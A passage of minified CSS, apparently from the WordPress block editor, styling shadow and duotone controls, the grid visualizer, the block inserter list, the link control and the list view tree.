width:230px; } .block-editor-global-styles__shadow__list{ display:flex; flex-wrap:wrap; gap:12px; padding-bottom:8px; } .block-editor-global-styles__clear-shadow{ text-align:right; } .block-editor-global-styles-filters-panel__dropdown,.block-editor-global-styles__shadow-dropdown{ border:1px solid #ddd; border-radius:2px; display:block; padding:0; position:relative; } .block-editor-global-styles-filters-panel__dropdown-toggle,.block-editor-global-styles__shadow-dropdown-toggle{ padding:8px; width:100%; } .block-editor-global-styles-filters-panel__dropdown-toggle.is-open,.block-editor-global-styles__shadow-dropdown-toggle.is-open{ background-color:#f0f0f0; } .block-editor-global-styles__shadow-editor__remove-button{ margin:auto 8px; opacity:0; position:absolute; right:0; top:8px; } @media not (prefers-reduced-motion){ .block-editor-global-styles__shadow-editor__remove-button{ transition:opacity .1s ease-in-out; } } .block-editor-global-styles__shadow-dropdown:hover .block-editor-global-styles__shadow-editor__remove-button,.block-editor-global-styles__shadow-editor__remove-button:focus,.block-editor-global-styles__shadow-editor__remove-button:hover{ opacity:1; } @media (hover:none){ .block-editor-global-styles__shadow-editor__remove-button{ opacity:1; } } .block-editor-global-styles__shadow-indicator{ align-items:center; appearance:none; background:none; border:1px solid #e0e0e0; border-radius:2px; box-sizing:border-box; color:#2f2f2f; cursor:pointer; display:inline-flex; height:26px; padding:0; transform:scale(1); width:26px; } @media not (prefers-reduced-motion){ .block-editor-global-styles__shadow-indicator{ transition:transform .1s ease; } } .block-editor-global-styles__shadow-indicator{ will-change:transform; } .block-editor-global-styles__shadow-indicator:focus{ border:2px solid #757575; } .block-editor-global-styles__shadow-indicator:hover{ transform:scale(1.2); } .block-editor-global-styles__shadow-indicator.unset{ background:linear-gradient(-45deg, #0000 48%, #ddd 0, #ddd 52%, #0000 0); } .block-editor-global-styles-advanced-panel__custom-css-input textarea{ direction:ltr; font-family:Menlo,Consolas,monaco,monospace; } .block-editor-panel-duotone-settings__reset{ margin:auto 8px; opacity:0; position:absolute; right:0; top:8px; } @media not (prefers-reduced-motion){ .block-editor-panel-duotone-settings__reset{ transition:opacity .1s ease-in-out; } } .block-editor-global-styles-filters-panel__dropdown:hover .block-editor-panel-duotone-settings__reset,.block-editor-panel-duotone-settings__reset:focus,.block-editor-panel-duotone-settings__reset:hover{ opacity:1; } @media (hover:none){ .block-editor-panel-duotone-settings__reset{ opacity:1; } } .block-editor-grid-visualizer.block-editor-grid-visualizer.block-editor-grid-visualizer{ z-index:30; } .block-editor-grid-visualizer.block-editor-grid-visualizer.block-editor-grid-visualizer .components-popover__content *{ pointer-events:none; } .block-editor-grid-visualizer.block-editor-grid-visualizer.block-editor-grid-visualizer.is-dropping-allowed .block-editor-grid-visualizer__drop-zone{ pointer-events:all; } .block-editor-grid-visualizer.block-editor-grid-visualizer.block-editor-grid-visualizer .block-editor-inserter *{ pointer-events:auto; } .block-editor-grid-visualizer__grid{ display:grid; position:absolute; } .block-editor-grid-visualizer__cell{ display:grid; position:relative; } .block-editor-grid-visualizer__cell .block-editor-inserter{ bottom:0; color:inherit; left:0; overflow:hidden; position:absolute; right:0; top:0; z-index:32; } .block-editor-grid-visualizer__cell .block-editor-inserter .block-editor-grid-visualizer__appender{ box-shadow:inset 0 0 0 1px color-mix(in srgb, currentColor 20%, #0000); color:inherit; height:100%; opacity:0; overflow:hidden; padding:0 !important; width:100%; } .block-editor-grid-visualizer__cell.is-highlighted .block-editor-grid-visualizer__drop-zone,.block-editor-grid-visualizer__cell.is-highlighted .block-editor-inserter{ background:var(--wp-admin-theme-color); } .block-editor-grid-visualizer__cell .block-editor-grid-visualizer__appender:focus,.block-editor-grid-visualizer__cell:hover .block-editor-grid-visualizer__appender{ background-color:color-mix(in srgb, currentColor 20%, #0000); opacity:1; } .block-editor-grid-visualizer__drop-zone{ background:#cccccc1a; grid-column:1; grid-row:1; height:100%; min-height:8px; min-width:8px; width:100%; } .block-editor-grid-item-resizer.block-editor-grid-item-resizer.block-editor-grid-item-resizer{ z-index:30; } .block-editor-grid-item-resizer.block-editor-grid-item-resizer.block-editor-grid-item-resizer .components-popover__content *{ pointer-events:none; } .block-editor-grid-item-resizer__box{ border:1px solid var(--wp-admin-theme-color); } .block-editor-grid-item-resizer__box .components-resizable-box__handle.components-resizable-box__handle.components-resizable-box__handle{ pointer-events:all; } .block-editor-grid-item-mover__move-button-container{ border:none; display:flex; justify-content:center; padding:0; } .block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button{ min-width:0 !important; padding-left:0; padding-right:0; width:24px; } .block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button svg{ min-width:24px; } .block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:before{ border-radius:2px; content:""; display:block; height:32px; left:8px; position:absolute; right:8px; z-index:-1; } @media not (prefers-reduced-motion){ .block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:before{ animation:components-button__appear-animation .1s ease; animation-fill-mode:forwards; } } .block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:focus,.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:focus:before,.block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:focus:enabled{ box-shadow:none; outline:none; } .block-editor-grid-item-mover__move-button-container .block-editor-grid-item-mover-button:focus-visible:before{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; } .block-editor-grid-item-mover__move-vertical-button-container{ display:flex; position:relative; } @media (min-width:600px){ .block-editor-grid-item-mover__move-vertical-button-container{ flex-direction:column; justify-content:space-around; } .block-editor-grid-item-mover__move-vertical-button-container>.block-editor-grid-item-mover-button.block-editor-grid-item-mover-button{ height:20px !important; min-width:0 !important; width:100%; } .block-editor-grid-item-mover__move-vertical-button-container>.block-editor-grid-item-mover-button.block-editor-grid-item-mover-button:before{ height:calc(100% - 4px); } .block-editor-grid-item-mover__move-vertical-button-container .block-editor-grid-item-mover-button.is-down-button svg,.block-editor-grid-item-mover__move-vertical-button-container .block-editor-grid-item-mover-button.is-up-button svg{ flex-shrink:0; height:20px; } .editor-collapsible-block-toolbar .block-editor-grid-item-mover__move-vertical-button-container{ height:40px; position:relative; top:-4px; } } .show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container{ position:relative; } @media (min-width:600px){ .show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container:before{ background:#e0e0e0; content:""; height:100%; position:absolute; top:0; width:1px; } } @media (min-width:782px){ .show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container:before{ background:#1e1e1e; } } .show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container.is-left{ padding-right:6px; } .show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container.is-left:before{ right:0; } .show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container.is-right{ padding-left:6px; } .show-icon-labels .block-editor-grid-item-mover__move-horizontal-button-container.is-right:before{ left:0; } @media (min-width:600px){ .show-icon-labels .block-editor-grid-item-mover__move-vertical-button-container:before{ background:#e0e0e0; content:""; height:1px; left:50%; margin-top:-.5px; position:absolute; top:50%; transform:translate(-50%); width:100%; } } @media (min-width:782px){ .show-icon-labels .block-editor-grid-item-mover__move-vertical-button-container:before{ background:#1e1e1e; } } .show-icon-labels .block-editor-grid-item-mover-button{ white-space:nowrap; } .show-icon-labels .editor-collapsible-block-toolbar .block-editor-grid-item-mover__move-horizontal-button-container:before{ background:#ddd; height:24px; top:4px; } .show-icon-labels .editor-collapsible-block-toolbar .block-editor-grid-item-mover__move-vertical-button-container:before{ background:#ddd; width:calc(100% - 24px); } .block-editor-height-control{ border:0; margin:0; padding:0; } .block-editor-iframe__container{ height:100%; width:100%; } .block-editor-iframe__scale-container{ height:100%; } .block-editor-iframe__scale-container.is-zoomed-out{ position:absolute; right:0; width:var(--wp-block-editor-iframe-zoom-out-scale-container-width, 100vw); } .block-editor-block-types-list__list-item{ display:block; margin:0; padding:0; width:33.33%; } .block-editor-block-types-list__list-item.is-synced .components-button.block-editor-block-types-list__item:not(:disabled) .block-editor-block-icon.has-colors{ color:var(--wp-block-synced-color); } .block-editor-block-types-list__list-item.is-synced .components-button.block-editor-block-types-list__item:not(:disabled):hover .block-editor-block-types-list__item-title{ color:var(--wp-block-synced-color) !important; filter:brightness(.95); } .block-editor-block-types-list__list-item.is-synced .components-button.block-editor-block-types-list__item:not(:disabled):hover svg{ color:var(--wp-block-synced-color) !important; } .block-editor-block-types-list__list-item.is-synced .components-button.block-editor-block-types-list__item:not(:disabled):after{ background:var(--wp-block-synced-color); } .components-button.block-editor-block-types-list__item{ align-items:stretch; background:#0000; color:#1e1e1e; cursor:pointer; display:flex; flex-direction:column; font-size:13px; justify-content:center; padding:8px; width:100%; word-break:break-word; } @media not (prefers-reduced-motion){ .components-button.block-editor-block-types-list__item{ transition:all .05s ease-in-out; } } .components-button.block-editor-block-types-list__item{ height:auto; position:relative; } .components-button.block-editor-block-types-list__item:disabled,.components-button.block-editor-block-types-list__item[aria-disabled=true]{ cursor:default; opacity:.6; } .components-button.block-editor-block-types-list__item:not(:disabled,[aria-disabled=true]):hover .block-editor-block-types-list__item-title{ color:var(--wp-admin-theme-color) !important; filter:brightness(.95); } .components-button.block-editor-block-types-list__item:not(:disabled,[aria-disabled=true]):hover svg{ color:var(--wp-admin-theme-color) !important; } .components-button.block-editor-block-types-list__item:not(:disabled,[aria-disabled=true]):hover:after{ background:var(--wp-admin-theme-color); border-radius:2px; bottom:0; content:""; left:0; opacity:.04; pointer-events:none; position:absolute; right:0; top:0; } .components-button.block-editor-block-types-list__item:not(:disabled,[aria-disabled=true]).is-active{ background:#1e1e1e; color:#fff; outline:2px solid #0000; outline-offset:-2px; } .components-button.block-editor-block-types-list__item:not(:disabled):focus{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .block-editor-block-types-list__item-icon{ color:#1e1e1e; padding:12px 20px; } @media not (prefers-reduced-motion){ .block-editor-block-types-list__item-icon{ transition:all .05s ease-in-out; } } .block-editor-block-types-list__item-icon .block-editor-block-icon{ margin-left:auto; margin-right:auto; } @media not (prefers-reduced-motion){ .block-editor-block-types-list__item-icon svg{ transition:all .15s ease-out; } } .block-editor-block-types-list__list-item[draggable=true] .block-editor-block-types-list__item-icon{ cursor:grab; } .block-editor-block-types-list__item-title{ font-size:12px; hyphens:auto; padding:4px 2px 8px; } .block-editor-block-inspector__tabs [role=tablist]{ width:100%; } .block-editor-inspector-popover-header{ margin-bottom:16px; } .items-justified-left{ justify-content:flex-start; } .items-justified-center{ justify-content:center; } .items-justified-right{ justify-content:flex-end; } .items-justified-space-between{ justify-content:space-between; } @keyframes loadingpulse{ 0%{ opacity:1; } 50%{ opacity:0; } to{ opacity:1; } } .block-editor-link-control{ min-width:350px; position:relative; } .components-popover__content .block-editor-link-control{ max-width:350px; min-width:auto; width:90vw; } .show-icon-labels .block-editor-link-control .components-button.has-icon svg{ display:none; } .show-icon-labels .block-editor-link-control .components-button.has-icon:before{ content:attr(aria-label); } .show-icon-labels .block-editor-link-control .block-editor-link-control__search-item-top{ flex-wrap:wrap; gap:4px; } .show-icon-labels .block-editor-link-control .block-editor-link-control__search-item-top .components-button.has-icon{ padding:4px; width:auto; } .show-icon-labels .block-editor-link-control .is-preview .block-editor-link-control__search-item-header{ margin-right:0; min-width:100%; } .block-editor-link-control__search-input-wrapper{ margin-bottom:8px; position:relative; } .block-editor-link-control__help{ color:#757575; font-size:12px; font-style:normal; margin-bottom:0; margin-top:-8px; padding:0 16px; } .block-editor-link-control__search-input-container,.block-editor-link-control__search-input-wrapper{ position:relative; } .block-editor-link-control__field{ margin:16px; } .block-editor-link-control__field .components-base-control__label{ color:#1e1e1e; } .block-editor-link-control__search-error{ margin:-8px 16px 16px; } .block-editor-link-control__search-actions{ padding:8px 16px 16px; } .block-editor-link-control__search-results-wrapper{ position:relative; } .block-editor-link-control__search-results-wrapper:after,.block-editor-link-control__search-results-wrapper:before{ content:""; display:block; left:-1px; pointer-events:none; position:absolute; right:16px; z-index:100; } .block-editor-link-control__search-results-wrapper:before{ bottom:auto; height:8px; top:0; } .block-editor-link-control__search-results-wrapper:after{ bottom:0; height:16px; top:auto; } .block-editor-link-control__search-results{ margin-top:-16px; max-height:200px; overflow-y:auto; padding:8px; } .block-editor-link-control__search-results.is-loading{ opacity:.2; } .block-editor-link-control__search-item.components-button.components-menu-item__button{ height:auto; text-align:left; } .block-editor-link-control__search-item .components-menu-item__item{ display:inline-block; overflow:hidden; text-overflow:ellipsis; width:100%; } .block-editor-link-control__search-item .components-menu-item__item mark{ background-color:initial; color:inherit; font-weight:600; } .block-editor-link-control__search-item .components-menu-item__shortcut{ color:#757575; white-space:nowrap; } .block-editor-link-control__search-item[aria-selected]{ background:#f0f0f0; } .block-editor-link-control__search-item.is-current{ background:#0000; border:0; cursor:default; flex-direction:column; padding:16px; width:100%; } .block-editor-link-control__search-item .block-editor-link-control__search-item-header{ align-items:center; display:block; flex-direction:row; gap:8px; margin-right:8px; overflow-wrap:break-word; white-space:pre-wrap; } .block-editor-link-control__search-item .block-editor-link-control__search-item-header .block-editor-link-control__search-item-info{ color:#757575; font-size:12px; line-height:1.1; word-break:break-all; } .block-editor-link-control__search-item.is-preview .block-editor-link-control__search-item-header{ display:flex; flex:1; } .block-editor-link-control__search-item.is-error .block-editor-link-control__search-item-header{ align-items:center; } .block-editor-link-control__search-item.is-url-title .block-editor-link-control__search-item-title{ word-break:break-all; } .block-editor-link-control__search-item .block-editor-link-control__search-item-details{ display:flex; flex-direction:column; gap:4px; justify-content:space-between; } .block-editor-link-control__search-item .block-editor-link-control__search-item-header .block-editor-link-control__search-item-icon{ background-color:#f0f0f0; border-radius:2px; height:32px; width:32px; } .block-editor-link-control__search-item .block-editor-link-control__search-item-icon{ align-items:center; display:flex; flex-shrink:0; justify-content:center; position:relative; } .block-editor-link-control__search-item .block-editor-link-control__search-item-icon img{ width:16px; } .block-editor-link-control__search-item.is-error .block-editor-link-control__search-item-icon{ max-height:32px; top:0; width:32px; } .block-editor-link-control__search-item .block-editor-link-control__search-item-title{ line-height:1.1; } .block-editor-link-control__search-item .block-editor-link-control__search-item-title:focus{ box-shadow:none; } .block-editor-link-control__search-item .block-editor-link-control__search-item-title:focus-visible{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); outline:2px solid #0000; text-decoration:none; } .block-editor-link-control__search-item .block-editor-link-control__search-item-title mark{ background-color:initial; color:inherit; font-weight:600; } .block-editor-link-control__search-item .block-editor-link-control__search-item-title span{ font-weight:400; } .block-editor-link-control__search-item .block-editor-link-control__search-item-title .components-external-link__icon{ height:1px; margin:-1px; overflow:hidden; padding:0; position:absolute; width:1px; clip:rect(0, 0, 0, 0); border:0; } .block-editor-link-control__search-item-top{ align-items:center; display:flex; flex-direction:row; width:100%; } .block-editor-link-control__search-item.is-fetching .block-editor-link-control__search-item-icon img,.block-editor-link-control__search-item.is-fetching .block-editor-link-control__search-item-icon svg{ opacity:0; } .block-editor-link-control__search-item.is-fetching .block-editor-link-control__search-item-icon:before{ background-color:#f0f0f0; border-radius:100%; bottom:0; content:""; display:block; left:0; position:absolute; right:0; top:0; } @media not (prefers-reduced-motion){ .block-editor-link-control__search-item.is-fetching .block-editor-link-control__search-item-icon:before{ animation:loadingpulse 1s linear infinite; animation-delay:.5s; } } .block-editor-link-control__loading{ align-items:center; display:flex; margin:16px; } .block-editor-link-control__loading .components-spinner{ margin-top:0; } .components-button+.block-editor-link-control__search-create{ overflow:visible; padding:12px 16px; } .components-button+.block-editor-link-control__search-create:before{ content:""; display:block; left:0; position:absolute; top:-10px; width:100%; } .block-editor-link-control__search-create{ align-items:center; } .block-editor-link-control__search-create .block-editor-link-control__search-item-title{ margin-bottom:0; } .block-editor-link-control__search-create .block-editor-link-control__search-item-icon{ top:0; } .block-editor-link-control__drawer-inner{ display:flex; flex-basis:100%; flex-direction:column; position:relative; } .block-editor-link-control__settings{ border:0; margin:0; padding:0; } .block-editor-link-control__setting{ flex:1; margin-bottom:0; padding:8px 24px; } .block-editor-link-control__setting .components-base-control:not(.components-input-control) .components-base-control__field{ display:flex; } .block-editor-link-control__setting .components-base-control__field .components-checkbox-control__label{ color:#1e1e1e; } .block-editor-link-control__setting input{ margin-left:0; } .is-preview .block-editor-link-control__setting{ padding:20px 8px 8px 0; } .block-editor-link-control__tools{ margin-top:-16px; padding:8px 8px 0; } .block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle{ gap:0; padding-left:0; } .block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=true]{ color:#1e1e1e; } .block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=true] svg{ visibility:visible; } @media not (prefers-reduced-motion){ .block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=true] svg{ transition:transform .1s ease; } } .block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=true] svg{ transform:rotate(90deg); } .block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=false] svg{ transform:rotate(0deg); visibility:visible; } @media not (prefers-reduced-motion){ .block-editor-link-control__tools .components-button.block-editor-link-control__drawer-toggle[aria-expanded=false] svg{ transition:transform .1s ease; } } .block-editor-link-control .block-editor-link-control__search-input .components-spinner{ display:block; } .block-editor-link-control .block-editor-link-control__search-input .components-spinner.components-spinner{ bottom:auto; left:auto; position:absolute; right:40px; top:calc(50% - 8px); } .block-editor-link-control .block-editor-link-control__search-input-wrapper.has-actions .components-spinner{ right:12px; top:calc(50% + 4px); } .block-editor-list-view-tree{ border-collapse:collapse; margin:0; padding:0; width:100%; } .components-modal__content .block-editor-list-view-tree{ margin:-12px -6px 0; width:calc(100% + 12px); } .block-editor-list-view-tree.is-dragging tbody{ pointer-events:none; } .block-editor-list-view-leaf{ position:relative; transform:translateY(0); } .block-editor-list-view-leaf.is-draggable,.block-editor-list-view-leaf.is-draggable .block-editor-list-view-block-contents{ cursor:grab; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button[aria-expanded=true]{ color:inherit; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button:hover{ color:var(--wp-admin-theme-color); } .block-editor-list-view-leaf .block-editor-list-view-block-select-button svg{ fill:currentColor; } @media (forced-colors:active){ .block-editor-list-view-leaf .block-editor-list-view-block-select-button svg{ fill:CanvasText; } } .is-dragging-components-draggable .block-editor-list-view-leaf:not(.is-selected) .block-editor-list-view-block-select-button:hover{ color:inherit; } .block-editor-list-view-leaf.is-selected td{ background:var(--wp-admin-theme-color); } .block-editor-list-view-leaf.is-selected.is-synced td{ background:var(--wp-block-synced-color); } .block-editor-list-view-leaf.is-synced:not(.is-selected) .block-editor-list-view-block-contents .block-editor-block-icon,.block-editor-list-view-leaf.is-synced:not(.is-selected) .block-editor-list-view-block-contents:focus,.block-editor-list-view-leaf.is-synced:not(.is-selected) .block-editor-list-view-block-contents:hover{ color:var(--wp-block-synced-color); } .block-editor-list-view-leaf.is-synced:not(.is-selected) .block-editor-list-view-block-contents:focus:after{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-block-synced-color); } .block-editor-list-view-leaf.is-selected .block-editor-list-view-block-contents,.block-editor-list-view-leaf.is-selected .components-button.has-icon{ color:#fff; } .block-editor-list-view-leaf.is-selected .block-editor-list-view-block-contents:focus:after{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); } .block-editor-list-view-leaf.is-selected.is-synced .block-editor-list-view-block-contents:focus:after{ box-shadow:inset 0 0 0 1px #fff, 0 0 0 var(--wp-admin-border-width-focus) var(--wp-block-synced-color); } .block-editor-list-view-leaf.is-selected .block-editor-list-view-block__menu:focus{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) #fff; } .block-editor-list-view-leaf.is-first-selected td:first-child{ border-top-left-radius:2px; } .block-editor-list-view-leaf.is-first-selected td:last-child{ border-top-right-radius:2px; } .block-editor-list-view-leaf.is-last-selected td:first-child{ border-bottom-left-radius:2px; } .block-editor-list-view-leaf.is-last-selected td:last-child{ border-bottom-right-radius:2px; } .block-editor-list-view-leaf.is-branch-selected:not(.is-selected):not(.is-synced-branch){ background:rgba(var(--wp-admin-theme-color--rgb), .04); } .block-editor-list-view-leaf.is-synced-branch.is-branch-selected{ background:rgba(var(--wp-block-synced-color--rgb), .04); } .block-editor-list-view-leaf.is-branch-selected.is-first-selected td:first-child{ border-top-left-radius:2px; } .block-editor-list-view-leaf.is-branch-selected.is-first-selected td:last-child{ border-top-right-radius:2px; } .block-editor-list-view-leaf[data-expanded=false].is-branch-selected.is-first-selected td:first-child{ border-top-left-radius:2px; } .block-editor-list-view-leaf[data-expanded=false].is-branch-selected.is-first-selected td:last-child{ border-top-right-radius:2px; } .block-editor-list-view-leaf[data-expanded=false].is-branch-selected.is-last-selected td:first-child{ border-bottom-left-radius:2px; } .block-editor-list-view-leaf[data-expanded=false].is-branch-selected.is-last-selected td:last-child{ border-bottom-right-radius:2px; } .block-editor-list-view-leaf.is-branch-selected:not(.is-selected) td{ border-radius:0; } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf.is-displacement-normal{ transition:transform .2s; } } .block-editor-list-view-leaf.is-displacement-normal{ transform:translateY(0); } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf.is-displacement-up{ transition:transform .2s; } } .block-editor-list-view-leaf.is-displacement-up{ transform:translateY(-32px); } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf.is-displacement-down{ transition:transform .2s; } } .block-editor-list-view-leaf.is-displacement-down{ transform:translateY(32px); } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf.is-after-dragged-blocks{ transition:transform .2s; } } .block-editor-list-view-leaf.is-after-dragged-blocks{ transform:translateY(calc(var(--wp-admin--list-view-dragged-items-height, 32px)*-1)); } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf.is-after-dragged-blocks.is-displacement-up{ transition:transform .2s; } } .block-editor-list-view-leaf.is-after-dragged-blocks.is-displacement-up{ transform:translateY(calc(-32px + var(--wp-admin--list-view-dragged-items-height, 32px)*-1)); } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf.is-after-dragged-blocks.is-displacement-down{ transition:transform .2s; } } .block-editor-list-view-leaf.is-after-dragged-blocks.is-displacement-down{ transform:translateY(calc(32px + var(--wp-admin--list-view-dragged-items-height, 32px)*-1)); } .block-editor-list-view-leaf.is-dragging{ left:0; opacity:0; pointer-events:none; z-index:-9999; } .block-editor-list-view-leaf .block-editor-list-view-block-contents{ align-items:center; border-radius:2px; box-sizing:border-box; color:inherit; display:flex; font-family:inherit; font-size:13px; font-weight:400; height:32px; margin:0; padding:6px 4px 6px 0; position:relative; text-align:left; text-decoration:none; white-space:nowrap; width:100%; } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf .block-editor-list-view-block-contents{ transition:box-shadow .1s linear; } } .components-modal__content .block-editor-list-view-leaf .block-editor-list-view-block-contents{ padding-left:0; padding-right:0; } .block-editor-list-view-leaf .block-editor-list-view-block-contents:focus,.block-editor-list-view-leaf.is-nesting .block-editor-list-view-block-contents{ box-shadow:none; } .block-editor-list-view-leaf .block-editor-list-view-block-contents:focus:after,.block-editor-list-view-leaf.is-nesting .block-editor-list-view-block-contents:after{ border-radius:inherit; bottom:0; box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); content:""; left:0; pointer-events:none; position:absolute; right:-29px; top:0; z-index:2; } .block-editor-list-view-leaf.has-single-cell .block-editor-list-view-block-contents:focus:after{ right:0; } .block-editor-list-view-leaf .block-editor-list-view-block__menu:focus,.block-editor-list-view-leaf.is-nesting .block-editor-list-view__menu{ box-shadow:inset 0 0 0 var(--wp-admin-border-width-focus) var(--wp-admin-theme-color); z-index:1; } .block-editor-list-view-leaf.is-visible .block-editor-list-view-block-contents{ opacity:1; } @keyframes __wp-base-styles-fade-in{ 0%{ opacity:0; } to{ opacity:1; } } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf.is-visible .block-editor-list-view-block-contents{ animation:__wp-base-styles-fade-in .08s linear 0s; animation-fill-mode:forwards; } } .block-editor-list-view-leaf .block-editor-block-icon{ flex:0 0 24px; margin-right:4px; } .block-editor-list-view-leaf .block-editor-list-view-block__contents-cell,.block-editor-list-view-leaf .block-editor-list-view-block__menu-cell,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell{ padding:0; } .block-editor-list-view-leaf .block-editor-list-view-block__menu-cell,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell{ line-height:0; vertical-align:middle; width:28px; } .block-editor-list-view-leaf .block-editor-list-view-block__menu-cell>*,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell>*{ opacity:0; } .block-editor-list-view-leaf .block-editor-list-view-block__menu-cell.is-visible>*,.block-editor-list-view-leaf .block-editor-list-view-block__menu-cell:focus-within>*,.block-editor-list-view-leaf .block-editor-list-view-block__menu-cell:hover>*,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell.is-visible>*,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell:focus-within>*,.block-editor-list-view-leaf .block-editor-list-view-block__mover-cell:hover>*{ opacity:1; } .block-editor-list-view-leaf .block-editor-list-view-block__mover-cell-alignment-wrapper{ align-items:center; display:flex; flex-direction:column; height:100%; } .block-editor-list-view-leaf .block-editor-block-mover-button{ height:24px; position:relative; width:36px; } .block-editor-list-view-leaf .block-editor-block-mover-button svg{ height:24px; position:relative; } .block-editor-list-view-leaf .block-editor-block-mover-button.is-up-button{ align-items:flex-end; margin-top:-6px; } .block-editor-list-view-leaf .block-editor-block-mover-button.is-up-button svg{ bottom:-4px; } .block-editor-list-view-leaf .block-editor-block-mover-button.is-down-button{ align-items:flex-start; margin-bottom:-6px; } .block-editor-list-view-leaf .block-editor-block-mover-button.is-down-button svg{ top:-4px; } .block-editor-list-view-leaf .block-editor-block-mover-button:before{ height:16px; left:0; min-width:100%; right:0; } .block-editor-list-view-leaf .block-editor-inserter__toggle{ background:#1e1e1e; color:#fff; height:24px; margin:6px 6px 6px 1px; min-width:24px; } .block-editor-list-view-leaf .block-editor-inserter__toggle:active{ color:#fff; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__label-wrapper svg{ left:2px; position:relative; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__title{ flex:1; position:relative; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__title .components-truncate{ position:absolute; transform:translateY(-50%); width:100%; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__anchor-wrapper{ max-width:min(110px, 40%); position:relative; width:100%; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__anchor{ position:absolute; right:0; transform:translateY(-50%); } .block-editor-list-view-leaf.is-selected .block-editor-list-view-block-select-button__anchor{ background:#0000004d; color:#fff; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__block-visibility,.block-editor-list-view-leaf .block-editor-list-view-block-select-button__lock,.block-editor-list-view-leaf .block-editor-list-view-block-select-button__sticky{ line-height:0; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__images{ display:flex; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__image{ background-size:cover; border-radius:1px; height:18px; width:18px; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__image:not(:only-child){ box-shadow:0 0 0 2px #fff; } .block-editor-list-view-leaf .block-editor-list-view-block-select-button__image:not(:first-child){ margin-left:-6px; } .block-editor-list-view-leaf.is-selected .block-editor-list-view-block-select-button__image:not(:only-child){ box-shadow:0 0 0 2px var(--wp-admin-theme-color); } .block-editor-list-view-draggable-chip{ opacity:.8; } .block-editor-list-view-appender__cell .block-editor-list-view-appender__container,.block-editor-list-view-appender__cell .block-editor-list-view-block__contents-container,.block-editor-list-view-block__contents-cell .block-editor-list-view-appender__container,.block-editor-list-view-block__contents-cell .block-editor-list-view-block__contents-container{ display:flex; } .block-editor-list-view__expander{ cursor:pointer; height:24px; width:24px; } .block-editor-list-view-leaf[aria-level] .block-editor-list-view__expander{ margin-left:192px; } .block-editor-list-view-leaf[aria-level="1"] .block-editor-list-view__expander{ margin-left:0; } .block-editor-list-view-leaf[aria-level="2"] .block-editor-list-view__expander{ margin-left:24px; } .block-editor-list-view-leaf[aria-level="3"] .block-editor-list-view__expander{ margin-left:48px; } .block-editor-list-view-leaf[aria-level="4"] .block-editor-list-view__expander{ margin-left:72px; } .block-editor-list-view-leaf[aria-level="5"] .block-editor-list-view__expander{ margin-left:96px; } .block-editor-list-view-leaf[aria-level="6"] .block-editor-list-view__expander{ margin-left:120px; } .block-editor-list-view-leaf[aria-level="7"] .block-editor-list-view__expander{ margin-left:144px; } .block-editor-list-view-leaf[aria-level="8"] .block-editor-list-view__expander{ margin-left:168px; } .block-editor-list-view-leaf .block-editor-list-view__expander{ visibility:hidden; } .block-editor-list-view-leaf[data-expanded=true] .block-editor-list-view__expander svg{ visibility:visible; } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf[data-expanded=true] .block-editor-list-view__expander svg{ transition:transform .2s ease; } } .block-editor-list-view-leaf[data-expanded=true] .block-editor-list-view__expander svg{ transform:rotate(90deg); } .block-editor-list-view-leaf[data-expanded=false] .block-editor-list-view__expander svg{ transform:rotate(0deg); visibility:visible; } @media not (prefers-reduced-motion){ .block-editor-list-view-leaf[data-expanded=false] .block-editor-list-view__expander svg{ transition:transform .2s ease; } } .block-editor-list-view-drop-indicator{ pointer-events:none; } .block-editor-list-view-drop-indicator 